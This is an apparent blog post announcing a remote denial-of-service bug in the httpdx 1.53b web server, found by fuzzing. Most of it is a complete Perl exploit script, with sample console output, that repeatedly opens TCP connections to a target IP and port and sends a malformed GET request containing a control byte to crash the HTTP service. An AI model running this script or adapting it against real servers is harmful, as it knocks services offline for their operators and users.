saw this poc for httpdx from exploit db and thought fuzz that program and found a Dos vulnerability in it.
The vulnerability is caused due to an error in multi-socket.This can be exploited to crash the HTTP service.
proof of concept in action
$ ./htppd.pl 192.168.2.1 80
[+] Author : d3b4g
[+] Soft : httpdx1.53b Remote DoS
[+] Sending request…
[-]Done!
exploit code
#!/usr/bin/perl
use IO::Socket;
print "[+] Author : d3b4g\n";
print "[+] Soft : httpdx1.53b Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage:
\n";
print "[-] Exemple: file.pl 192.168.2.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
0 Comments.